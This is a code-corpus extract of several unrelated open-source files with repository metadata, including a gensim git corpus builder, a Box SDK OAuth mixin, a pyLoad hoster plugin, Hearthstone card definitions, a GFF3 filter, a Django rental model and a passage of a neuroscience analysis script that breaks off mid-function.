|
src/corpora.py
|
1
|
8562
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# [The "New BSD" license]
# Copyright (c) 2014 The Board of Trustees of The University of Alabama
# All rights reserved.
#
# See LICENSE for details.
"""
Code for generating the corpora.
"""
from StringIO import StringIO
import re
import gensim
import dulwich
import dulwich.repo
import dulwich.patch
from preprocessing import tokenize, split, remove_stops, read_stops, to_unicode
import logging
logger = logging.getLogger('mct.corpora')
STOPS = read_stops([
'data/english_stops.txt',
'data/java_reserved.txt',
])
class GitCorpus(gensim.interfaces.CorpusABC):
"""
Helper class to simplify the pipeline of getting bag-of-words vectors (=
a gensim corpus) from plain text.
This is an abstract base class: override the `get_texts()` method to match
your particular input.
    Given a dulwich repository (and optionally a ref) in the constructor, the
    corpus object will be automatically initialized with a dictionary in
    `self.id2word` and will support the `iter` corpus method. You must only
    provide a correct `get_texts` implementation.
"""
def __init__(self, repo=None, ref='HEAD', remove_stops=True,
split=True, lower=True, min_len=3, max_len=40,
lazy_dict=False):
logger.info('Creating %s corpus out of source files for commit %s' % (
self.__class__.__name__, ref))
self.repo = repo
self.remove_stops = remove_stops
self.split = split
self.lower = lower
self.min_len = min_len
self.max_len = max_len
self.lazy_dict = lazy_dict
self.id2word = gensim.corpora.Dictionary()
self.metadata = False
# ensure ref is a str otherwise dulwich cries
if type(ref) is unicode:
self.ref = ref.encode('utf-8')
else:
self.ref = ref
self.ref_tree = None
if repo is not None:
# find which file tree is for the commit we care about
self.ref_tree = self.repo[self.ref].tree
if not lazy_dict:
# build the dict (not lazy)
self.id2word.add_documents(self.get_texts())
super(GitCorpus, self).__init__()
def preprocess(self, document, info=[]):
document = to_unicode(document, info)
words = tokenize(document)
if self.split:
words = split(words)
if self.lower:
words = (word.lower() for word in words)
if self.remove_stops:
words = remove_stops(words, STOPS)
def include(word):
return len(word) >= self.min_len and len(word) <= self.max_len
words = (word for word in words if include(word))
return words
def __iter__(self):
"""
The function that defines a corpus.
Iterating over the corpus must yield sparse vectors, one for each
document.
"""
for text in self.get_texts():
if self.metadata:
meta = text[1]
text = text[0]
yield (self.id2word.doc2bow(text, allow_update=self.lazy_dict),
meta)
else:
yield self.id2word.doc2bow(text, allow_update=self.lazy_dict)
def get_texts(self):
"""
Iterate over the collection, yielding one document at a time. A document
is a sequence of words (strings) that can be fed into
`Dictionary.doc2bow`.
Override this function to match your input (parse input files, do any
text preprocessing, lowercasing, tokenizing etc.). There will be no
further preprocessing of the words coming out of this function.
"""
raise NotImplementedError
def __len__(self):
return self.length # will throw if corpus not initialized
class MultiTextCorpus(GitCorpus):
def get_texts(self):
length = 0
for entry in self.repo.object_store.iter_tree_contents(self.ref_tree):
fname = entry.path
document = self.repo.object_store.get_raw(entry.sha)[1]
if dulwich.patch.is_binary(document):
continue
words = self.preprocess(document, [fname, self.ref])
length += 1
if self.metadata:
yield words, (fname, u'en')
else:
yield words
self.length = length # only reset after iteration is done.
class ChangesetCorpus(GitCorpus):
def _get_diff(self, changeset):
""" Return a text representing a `git diff` for the files in the
changeset.
"""
patch_file = StringIO()
dulwich.patch.write_object_diff(patch_file,
self.repo.object_store,
changeset.old, changeset.new)
return patch_file.getvalue()
def _walk_changes(self, reverse=False):
""" Returns one file change at a time, not the entire diff.
"""
for walk_entry in self.repo.get_walker(reverse=reverse):
commit = walk_entry.commit
# initial revision, has no parent
if len(commit.parents) == 0:
for changes in dulwich.diff_tree.tree_changes(
self.repo.object_store, None, commit.tree
):
diff = self._get_diff(changes)
yield commit.id, None, diff
for parent in commit.parents:
# do I need to know the parent id?
for changes in dulwich.diff_tree.tree_changes(
self.repo.object_store, self.repo[parent].tree, commit.tree
):
diff = self._get_diff(changes)
yield commit.id, parent, diff
def get_texts(self):
length = 0
unified = re.compile(r'^[+ -].*')
current = None
low = list() # collecting the list of words
for commit, parent, diff in self._walk_changes():
# write out once all diff lines for commit have been collected
# this is over all parents and all files of the commit
if current is None:
# set current for the first commit, clear low
current = commit
low = list()
elif current != commit:
# new commit seen, yield the collected low
if self.metadata:
yield low, (current, u'en')
else:
yield low
length += 1
current = commit
low = list()
# to process out whitespace only changes, the rest of this
# loop will need to be structured differently. possibly need
# to actually parse the diff to gain structure knowledge
# (ie, line numbers of the changes).
diff_lines = filter(lambda x: unified.match(x),
diff.splitlines())
if len(diff_lines) < 2:
continue # useful for not worrying with binary files
# sanity?
assert diff_lines[0].startswith('--- '), diff_lines[0]
assert diff_lines[1].startswith('+++ '), diff_lines[1]
# parent_fn = diff_lines[0][4:]
# commit_fn = diff_lines[1][4:]
lines = diff_lines[2:] # chop off file names hashtag rebel
lines = [line[1:] for line in lines] # remove unified markers
document = ' '.join(lines)
# call the tokenizer
words = self.preprocess(document,
[commit, str(parent), diff_lines[0]])
low.extend(words)
length += 1
if self.metadata:
# have reached the end, yield whatever was collected last
yield low, (current, u'en')
else:
yield low
self.length = length # only reset after iteration is done.
class CommitLogCorpus(GitCorpus):
def get_texts(self):
length = 0
for walk_entry in self.repo.get_walker():
commit = walk_entry.commit
words = self.preprocess(commit.message, [commit.id])
length += 1
if self.metadata:
# have reached the end, yield whatever was collected last
yield words, (commit.id, u'en')
else:
yield words
self.length = length # only reset after iteration is done.
|
bsd-3-clause
| -8,410,882,084,569,625,000 | 31.309434 | 80 | 0.560266 | false |
box/box-python-sdk
|
boxsdk/auth/cooperatively_managed_oauth2.py
|
1
|
1125
|
# coding: utf-8
from __future__ import unicode_literals
from .oauth2 import OAuth2
class CooperativelyManagedOAuth2Mixin(OAuth2):
"""
Box SDK OAuth2 mixin.
Allows for sharing auth tokens between multiple clients.
"""
def __init__(self, retrieve_tokens=None, *args, **kwargs):
"""
:param retrieve_tokens:
Callback to get the current access/refresh token pair.
:type retrieve_tokens:
`callable` of () => (`unicode`, `unicode`)
"""
# pylint:disable=keyword-arg-before-vararg
self._retrieve_tokens = retrieve_tokens
super(CooperativelyManagedOAuth2Mixin, self).__init__(*args, **kwargs)
def _get_tokens(self):
"""
Base class override. Get the tokens from the user-specified callback.
"""
return self._retrieve_tokens()
class CooperativelyManagedOAuth2(CooperativelyManagedOAuth2Mixin):
"""
Box SDK OAuth2 subclass.
Allows for sharing auth tokens between multiple clients. The retrieve_tokens callback should
return the current access/refresh token pair.
"""
pass
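# Illustrative usage sketch (hedged: `token_store` is a hypothetical shared
# token store, and the remaining keyword arguments are simply those of the
# base OAuth2 constructor):
#
#     def retrieve_tokens():
#         return token_store.access_token, token_store.refresh_token
#
#     auth = CooperativelyManagedOAuth2(
#         retrieve_tokens=retrieve_tokens,
#         client_id='YOUR_CLIENT_ID',
#         client_secret='YOUR_CLIENT_SECRET',
#     )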
|
apache-2.0
| -1,451,916,053,912,874,200 | 30.25 | 96 | 0.654222 | false |
rlindner81/pyload
|
module/plugins/hoster/ZbigzCom.py
|
1
|
4492
|
# -*- coding: utf-8 -*-
import random
import re
import time
import urlparse
from module.plugins.internal.Hoster import Hoster
from module.plugins.internal.misc import json
class ZbigzCom(Hoster):
__name__ = "ZbigzCom"
__type__ = "hoster"
__version__ = "0.02"
__status__ = "testing"
__pattern__ = r'https?://.+\.torrent|magnet:\?.+'
__config__ = [("activated", "bool", "Activated", False)]
__description__ = """Zbigz.com hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("GammaC0de", "nitzo2001[AT}yahoo[DOT]com")]
def jquery_call(self, url, file_id, call_id, **kwargs):
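        # Emulate the site's jQuery JSONP requests: build a
        # "jQuery<call_id>_<timestamp>" callback name, pass it as the
        # `jsoncallback` GET parameter, and unwrap the JSON payload from the
        # "callback(...);" response body.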
current_millis = int(time.time() * 1000)
json_callback = "jQuery" + call_id + "_" + str(current_millis)
urlp = urlparse.urlparse(url)
get_params = kwargs.copy()
get_params.update(urlparse.parse_qs(urlp.query))
get_params['hash'] = file_id
get_params['jsoncallback'] = json_callback
get_params['_'] = current_millis
jquery_data = self.load(
urlp.scheme +
"://" +
urlp.netloc +
urlp.path,
get=get_params)
m = re.search("%s\((.+?)\);" % json_callback, jquery_data)
return json.loads(m.group(1)) if m else None
def sleep(self, sec):
for _i in range(sec):
if self.pyfile.abort:
break
time.sleep(1)
def process(self, pyfile):
self.data = self.load("http://m.zbigz.com/myfiles",
post={'url': pyfile.url})
if "Error. Only premium members are able to download" in self.data:
self.fail(_("File can be downloaded by premium users only"))
m = re.search(r'&hash=(\w+)"', self.data)
if m is None:
self.fail("Hash not found")
file_id = m.group(1)
call_id = "".join([random.choice("0123456789") for _x in range(20)])
self.pyfile.setCustomStatus("torrent")
self.pyfile.setProgress(0)
json_data = self.jquery_call(
"http://m.zbigz.com/core/info.php", file_id, call_id)
if json_data is None:
self.fail("Unexpected jQuery response")
if 'faultString' in json_data:
self.fail(json_data['faultString'])
pyfile.name = json_data['info']['name'] + \
(".zip" if len(json_data['files']) > 1 else "")
pyfile.size = json_data['info']['size']
while True:
json_data = self.jquery_call(
"http://m.zbigz.com/core/info.php", file_id, call_id)
if json_data is None:
self.fail("Unexpected jQuery response")
if 'faultString' in json_data:
self.fail(json_data['faultString'])
progress = int(json_data['info']['progress'])
pyfile.setProgress(progress)
if json_data['info']['state'] != "downloading" or progress == 100:
break
self.sleep(5)
pyfile.setProgress(100)
if len(json_data['files']) == 1:
download_url = "http://m.zbigz.com/file/%s/0" % file_id
else:
self.data = self.load("http://m.zbigz.com/file/%s/-1" % file_id)
m = re.search(
r'\'(http://\w+.zbigz.com/core/zipstate.php\?hash=%s&did=(\w+)).+?\'' %
file_id, self.data)
if m is None:
self.fail("Zip state URL not found")
zip_status_url = m.group(1)
download_id = m.group(2)
m = re.search(
r'\'(http://\w+.zbigz.com/z/%s/.+?)\'' %
download_id, self.data)
if m is None:
self.fail("Zip download URL not found")
download_url = m.group(1)
self.pyfile.setCustomStatus("zip")
self.pyfile.setProgress(0)
while True:
json_data = self.jquery_call(zip_status_url, file_id, call_id)
if json_data is None:
self.fail("Unexpected jQuery response")
if 'faultString' in json_data:
self.fail(json_data['faultString'])
progress = int(json_data['proc'])
self.pyfile.setProgress(progress)
if progress == 100:
break
self.sleep(5)
self.download(download_url)
self.load("http://m.zbigz.com/delete.php?hash=%s" % file_id)
|
gpl-3.0
| 4,467,117,906,312,538,000 | 29.557823 | 87 | 0.518923 | false |
SimonBiggs/electronfactors
|
test/test_poi.py
|
1
|
1335
|
# Copyright (C) 2015 Simon Biggs
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# http://www.gnu.org/licenses/.
import numpy as np
from electronfactors.ellipse.equivalent import poi_distance_method
def test_centre_of_square():
XCoords = np.array([-3, 3, 3, -3])
YCoords = np.array([3, 3, -3, -3])
poi = poi_distance_method(
XCoords=XCoords, YCoords=YCoords
)
assert np.abs(poi[0]) < 0.1
assert np.abs(poi[1]) < 0.1
def test_centre_of_arbitrary_cutout():
XCoords = np.array([-1, -0.2, 0, 0.7, 1, 0]) * 4 + 1
YCoords = np.array([0, -1, -.8, 0, .6, 1]) * 4 - 1
poi = poi_distance_method(
XCoords=XCoords, YCoords=YCoords
)
assert np.abs(poi[0] - 0.92) < 0.1
assert np.abs(poi[1] + 0.62) < 0.1
|
agpl-3.0
| -1,580,463,007,600,693,000 | 31.560976 | 66 | 0.677903 | false |
jirenz/CS229_Project
|
hearthbreaker/cards/minions/druid.py
|
1
|
11367
|
from hearthbreaker.cards.base import MinionCard, ChoiceCard
from hearthbreaker.game_objects import Minion
from hearthbreaker.tags.action import Give, Damage, Silence, Transform, Draw, Heal, \
Summon, AddCard, GiveManaCrystal, Remove, Kill
from hearthbreaker.tags.base import Choice, Buff, Effect, Battlecry, Deathrattle, ActionTag
from hearthbreaker.tags.card_source import CardList, ObjectSource
from hearthbreaker.tags.condition import IsType, GreaterThan
from hearthbreaker.tags.event import Damaged, TurnEnded
from hearthbreaker.tags.selector import CharacterSelector, MinionSelector, SelfSelector, UserPicker, BothPlayer, \
PlayerSelector, HeroSelector, Count, DeadMinionSelector
from hearthbreaker.constants import CHARACTER_CLASS, CARD_RARITY, MINION_TYPE
from hearthbreaker.tags.status import ChangeAttack, ChangeHealth, Taunt, ManaChange
from hearthbreaker.cards.spells.neutral import spare_part_list
class Moonfire(ChoiceCard):
def __init__(self):
super().__init__("Moonfire", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, ref_name="moonfire_keeper")
class Dispel(ChoiceCard):
def __init__(self):
super().__init__("Dispel", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class KeeperOfTheGrove(MinionCard):
def __init__(self):
super().__init__("Keeper of the Grove", 4, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, choices=[
Choice(Moonfire(), Damage(2), CharacterSelector(players=BothPlayer(), picker=UserPicker())),
Choice(Dispel(), Silence(), MinionSelector(players=BothPlayer(), picker=UserPicker()))
])
def create_minion(self, player):
return Minion(2, 4)
class CatDruid(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Claw (cat)")
def create_minion(self, p):
return Minion(4, 4, charge=True)
class BearDruid(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Claw (bear)")
def create_minion(self, p):
return Minion(4, 6, taunt=True)
class CatForm(ChoiceCard):
def __init__(self):
super().__init__("Cat Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class BearForm(ChoiceCard):
def __init__(self):
super().__init__("Bear Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class DruidOfTheClaw(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, choices=[
Choice(CatForm(), Transform(CatDruid()), SelfSelector()),
Choice(BearForm(), Transform(BearDruid()), SelfSelector())
])
def create_minion(self, player):
return Minion(4, 4)
class AncientSecrets(ChoiceCard):
def __init__(self):
super().__init__("Ancient Secrets", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientTeachings(ChoiceCard):
def __init__(self):
super().__init__("Ancient Teachings", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientOfLore(MinionCard):
def __init__(self):
super().__init__("Ancient of Lore", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.EPIC, choices=[
Choice(AncientSecrets(), Heal(5), HeroSelector()),
Choice(AncientTeachings(), Draw(3), PlayerSelector())
])
def create_minion(self, player):
return Minion(5, 5)
class Health(ChoiceCard):
def __init__(self):
super().__init__("Rooted", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class Attack(ChoiceCard):
def __init__(self):
super().__init__("Uproot", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientOfWar(MinionCard):
def __init__(self):
super().__init__("Ancient of War", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.EPIC, choices=[
Choice(Health(), Give([Buff(ChangeHealth(5)), Buff(Taunt())]), SelfSelector()),
Choice(Attack(), Give([Buff(ChangeAttack(5))]), SelfSelector()),
])
def create_minion(self, player):
return Minion(5, 5)
class IronbarkProtector(MinionCard):
def __init__(self):
super().__init__("Ironbark Protector", 8, CHARACTER_CLASS.DRUID,
CARD_RARITY.COMMON)
def create_minion(self, player):
return Minion(8, 8, taunt=True)
class TauntTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, ref_name="Treant (taunt)")
def create_minion(self, p):
return Minion(2, 2, taunt=True)
class Treant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
def create_minion(self, _):
return Minion(2, 2)
class ChargeTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, ref_name="Treant (charge)")
def create_minion(self, player):
return Minion(2, 2, charge=True, effects=[Effect(TurnEnded(), ActionTag(Kill(), SelfSelector()))])
class PoisonSeedsTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False,
ref_name="Treant (poison seeds)")
def create_minion(self, player):
return Minion(2, 2)
class Panther(MinionCard):
def __init__(self):
super().__init__("Panther", 2, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST)
def create_minion(self, _):
return Minion(3, 2, MINION_TYPE.BEAST)
class IncreaseStats(ChoiceCard):
def __init__(self):
super().__init__("Give your other minions +2/+2 and taunt", 0,
CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, False)
class SummonTreants(ChoiceCard):
def __init__(self):
super().__init__("Summon two 2/2 Treants with taunt", 0,
CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, False)
class Cenarius(MinionCard):
def __init__(self):
super().__init__("Cenarius", 9, CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, choices=[
Choice(IncreaseStats(), Give([Buff(ChangeAttack(2)),
Buff(ChangeHealth(2)),
Buff(Taunt())]), MinionSelector()),
Choice(SummonTreants(), Summon(TauntTreant(), 2), PlayerSelector())
])
def create_minion(self, player):
return Minion(5, 8)
class AttackMode(ChoiceCard):
def __init__(self):
super().__init__("Attack Mode", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class TankMode(ChoiceCard):
def __init__(self):
super().__init__("Tank Mode", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AnodizedRoboCub(MinionCard):
def __init__(self):
super().__init__("Anodized Robo Cub", 2, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON,
minion_type=MINION_TYPE.MECH,
choices=[Choice(AttackMode(), Give([Buff(ChangeAttack(1))]), SelfSelector()),
Choice(TankMode(), Give([Buff(ChangeHealth(1))]), SelfSelector())])
def create_minion(self, player):
return Minion(2, 2, taunt=True)
class MechBearCat(MinionCard):
def __init__(self):
super().__init__("Mech-Bear-Cat", 6, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, minion_type=MINION_TYPE.MECH)
def create_minion(self, player):
return Minion(7, 6, effects=[Effect(Damaged(),
ActionTag(AddCard(CardList(spare_part_list)), PlayerSelector()))])
class CobraForm(MinionCard):
def __init__(self):
super().__init__("Druid of the Fang", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Fang (cobra)")
def create_minion(self, player):
return Minion(7, 7)
class DruidOfTheFang(MinionCard):
def __init__(self):
super().__init__("Druid of the Fang", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON,
battlecry=Battlecry(Transform(CobraForm()), SelfSelector(),
GreaterThan(Count(MinionSelector(IsType(MINION_TYPE.BEAST))), value=0)))
def create_minion(self, player):
return Minion(4, 4)
class Malorne(MinionCard):
def __init__(self):
super().__init__("Malorne", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, minion_type=MINION_TYPE.BEAST)
def create_minion(self, player):
return Minion(9, 7, deathrattle=[Deathrattle(AddCard(ObjectSource(SelfSelector()),
add_to_deck=True), PlayerSelector()),
Deathrattle(Remove(), SelfSelector())])
class GiftOfMana(ChoiceCard):
def __init__(self):
super().__init__("Gift of Mana", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE)
class GiftOfCards(ChoiceCard):
def __init__(self):
super().__init__("Gift of Cards", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE)
class GroveTender(MinionCard):
def __init__(self):
super().__init__("Grove Tender", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, choices=[
Choice(GiftOfMana(), GiveManaCrystal(), PlayerSelector(players=BothPlayer())),
Choice(GiftOfCards(), Draw(), PlayerSelector(players=BothPlayer()))
])
def create_minion(self, player):
return Minion(2, 4)
class FlameCat(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Flame (cat)")
def create_minion(self, p):
return Minion(5, 2)
class FlameBird(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Flame (bird)")
def create_minion(self, p):
return Minion(2, 5)
class FlameCatForm(ChoiceCard):
def __init__(self):
super().__init__("Flame Cat Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class FlameBirdForm(ChoiceCard):
def __init__(self):
super().__init__("Flame Bird Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class DruidOfTheFlame(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, choices=[
Choice(FlameCatForm(), Transform(FlameCat()), SelfSelector()),
Choice(FlameBirdForm(), Transform(FlameBird()), SelfSelector())
])
def create_minion(self, player):
return Minion(2, 2)
class VolcanicLumberer(MinionCard):
def __init__(self):
super().__init__("Volcanic Lumberer", 9, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE,
buffs=[Buff(ManaChange(Count(DeadMinionSelector(players=BothPlayer())), -1))])
def create_minion(self, player):
return Minion(7, 8, taunt=True)
|
mit
| 5,221,729,277,601,726,000 | 34.521875 | 118 | 0.622064 | false |
TAMU-CPT/galaxy-tools
|
tools/gff3/gff3_filter.py
|
1
|
1553
|
#!/usr/bin/env python
import sys
import logging
import argparse
from cpt_gffParser import gffParse, gffWrite
from gff3 import feature_lambda, feature_test_qual_value
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def gff_filter(gff3, id_list=None, id="", attribute_field="ID", subfeatures=True):
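    # "__cn__" is the encoded newline used by the Galaxy tool form, so both the
    # attribute field and the inline id string may carry several values packed
    # into a single argument.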
attribute_field = attribute_field.split("__cn__")
if id_list:
filter_strings = [line.strip() for line in id_list]
else:
filter_strings = [x.strip() for x in id.split("__cn__")]
for rec in gffParse(gff3):
rec.features = feature_lambda(
rec.features,
feature_test_qual_value,
{"qualifier": attribute_field, "attribute_list": filter_strings},
subfeatures=subfeatures,
)
rec.annotations = {}
gffWrite([rec], sys.stdout)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="extract features from a GFF3 file based on ID/qualifiers"
)
parser.add_argument("gff3", type=argparse.FileType("r"), help="GFF3 annotations")
parser.add_argument("--id_list", type=argparse.FileType("r"))
parser.add_argument("--id", type=str)
parser.add_argument(
"--attribute_field",
type=str,
help="Column 9 Field to search against",
default="ID",
)
parser.add_argument(
"--subfeatures",
action="store_true",
help="Retain subfeature tree of matched features",
)
args = parser.parse_args()
gff_filter(**vars(args))
|
gpl-3.0
| 2,550,448,760,510,067,700 | 31.354167 | 85 | 0.627817 | false |
verleihtool/verleihtool
|
rental/models.py
|
1
|
4155
|
import uuid
from datetime import datetime
from django.db import models
from django.core.exceptions import ValidationError
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from depot.models import Depot, Item
class Rental(models.Model):
"""
A rental defines the amount of items and has a start and return date.
Only items from one depot can be requested for rental at once.
    When requesting a rental, the user has to enter their full name and email
    address as well as describe the purpose of the rental. If the user is
    logged in, their id will be stored as well.
After creating a rental request, it is in the PENDING state. From this,
it can be either APPROVED or DECLINED by a depot manager or REVOKED by
the requesting user. If all items were returned correctly, it can be
set to RETURNED to finish the rental process.
:author: Benedikt Seidl
"""
STATE_PENDING = '1'
STATE_APPROVED = '2'
STATE_DECLINED = '3'
STATE_REVOKED = '4'
STATE_RETURNED = '5'
STATES = (
(STATE_PENDING, _('pending')),
(STATE_APPROVED, _('approved')),
(STATE_DECLINED, _('declined')),
(STATE_REVOKED, _('revoked')),
(STATE_RETURNED, _('returned')),
)
uuid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
depot = models.ForeignKey(Depot, on_delete=models.CASCADE)
items = models.ManyToManyField(Item, through='ItemRental')
firstname = models.CharField(max_length=32)
lastname = models.CharField(max_length=32)
email = models.EmailField()
purpose = models.CharField(max_length=256)
user = models.ForeignKey(User, blank=True, null=True, on_delete=models.SET_NULL)
start_date = models.DateTimeField()
return_date = models.DateTimeField()
state = models.CharField(max_length=1, choices=STATES, default=STATE_PENDING)
def clean(self):
if not self.depot.active:
raise ValidationError({'depot': 'The depot has to be active.'})
if self.start_date > self.return_date:
raise ValidationError({
'start_date': 'The start date must be before the return date.'
})
if self.start_date < datetime.now() and self.state == self.STATE_PENDING:
raise ValidationError({
'start_date': 'The start date must be in the future for new rentals.'
})
def __str__(self):
return 'Rental by %s %s' % (self.firstname, self.lastname)
class ItemRental(models.Model):
"""
Intermediate relationship for each item within a rental.
Defines the quantity and number of returned items.
:author: Benedikt Seidl
"""
rental = models.ForeignKey(Rental, on_delete=models.CASCADE)
item = models.ForeignKey(Item, on_delete=models.CASCADE)
quantity = models.PositiveSmallIntegerField()
returned = models.PositiveSmallIntegerField(default=0)
def clean(self):
if self.rental.depot_id != self.item.depot_id:
raise ValidationError({
'item': 'The item must come from the depot the rental was created for.'
})
if self.item.visibility != Item.VISIBILITY_PUBLIC:
organization = self.rental.depot.organization
user = self.rental.user
if user is None or not organization.is_member(user):
raise ValidationError({
'item': 'You have to be a member of the organization '
'that manages this depot to rent an internal item.'
})
if self.quantity <= 0 or self.quantity > self.item.quantity:
raise ValidationError({
'quantity': 'The quantity must be positive and less than or '
'equal to the total amount of available items.'
})
if self.returned > self.quantity:
raise ValidationError({
'returned': 'The amount of returned items must be less than or '
'equal to the total amount of rented items.'
})
|
agpl-3.0
| -2,842,070,960,775,333,000 | 37.119266 | 87 | 0.637545 | false |
gviejo/ThalamusPhysio
|
python/main_pop_pca.py
|
1
|
15802
|
import numpy as np
import pandas as pd
# from matplotlib.pyplot import plot,show,draw
import scipy.io
from functions import *
import _pickle as cPickle
import time
import os, sys
import ipyparallel
import neuroseries as nts
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
# to know which neurons to keep
theta_mod, theta_ses = loadThetaMod('/mnt/DataGuillaume/MergedData/THETA_THAL_mod.pickle', datasets, return_index=True)
theta = pd.DataFrame( index = theta_ses['rem'],
columns = ['phase', 'pvalue', 'kappa'],
data = theta_mod['rem'])
tmp2 = theta.index[theta.isnull().any(1)].values
tmp3 = theta.index[(theta['pvalue'] > 0.01).values].values
tmp = np.unique(np.concatenate([tmp2,tmp3]))
theta_modth = theta.drop(tmp, axis = 0)
neurons_index = theta_modth.index.values
bins1 = np.arange(-1005, 1010, 25)*1000
times = np.floor(((bins1[0:-1] + (bins1[1] - bins1[0])/2)/1000)).astype('int')
premeanscore = {i:{'rem':pd.DataFrame(index = [], columns = ['mean', 'std']),'rip':pd.DataFrame(index = times, columns = [])} for i in range(3)}# BAD
posmeanscore = {i:{'rem':pd.DataFrame(index = [], columns = ['mean', 'std']),'rip':pd.DataFrame(index = times, columns = [])} for i in range(3)}# BAD
bins2 = np.arange(-1012.5,1025,25)*1000
tsmax = {i:pd.DataFrame(columns = ['pre', 'pos']) for i in range(3)}
clients = ipyparallel.Client()
print(clients.ids)
dview = clients.direct_view()
def compute_pop_pca(session):
data_directory = '/mnt/DataGuillaume/MergedData/'
import numpy as np
import scipy.io
import scipy.stats
import _pickle as cPickle
import time
import os, sys
import neuroseries as nts
from functions import loadShankStructure, loadSpikeData, loadEpoch, loadThetaMod, loadSpeed, loadXML, loadRipples, loadLFP, downsample, getPeaksandTroughs, butter_bandpass_filter
import pandas as pd
# to know which neurons to keep
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
theta_mod, theta_ses = loadThetaMod('/mnt/DataGuillaume/MergedData/THETA_THAL_mod.pickle', datasets, return_index=True)
theta = pd.DataFrame( index = theta_ses['rem'],
columns = ['phase', 'pvalue', 'kappa'],
data = theta_mod['rem'])
tmp2 = theta.index[theta.isnull().any(1)].values
tmp3 = theta.index[(theta['pvalue'] > 0.01).values].values
tmp = np.unique(np.concatenate([tmp2,tmp3]))
theta_modth = theta.drop(tmp, axis = 0)
neurons_index = theta_modth.index.values
bins1 = np.arange(-1005, 1010, 25)*1000
times = np.floor(((bins1[0:-1] + (bins1[1] - bins1[0])/2)/1000)).astype('int')
premeanscore = {i:{'rem':pd.DataFrame(index = [], columns = ['mean', 'std']),'rip':pd.DataFrame(index = times, columns = [])} for i in range(3)}
posmeanscore = {i:{'rem':pd.DataFrame(index = [], columns = ['mean', 'std']),'rip':pd.DataFrame(index = times, columns = [])} for i in range(3)}
bins2 = np.arange(-1012.5,1025,25)*1000
tsmax = {i:pd.DataFrame(columns = ['pre', 'pos']) for i in range(3)}
# for session in datasets:
# for session in datasets[0:15]:
# for session in ['Mouse12/Mouse12-120815']:
start_time = time.clock()
print(session)
generalinfo = scipy.io.loadmat(data_directory+session+'/Analysis/GeneralInfo.mat')
shankStructure = loadShankStructure(generalinfo)
if len(generalinfo['channelStructure'][0][0][1][0]) == 2:
hpc_channel = generalinfo['channelStructure'][0][0][1][0][1][0][0] - 1
else:
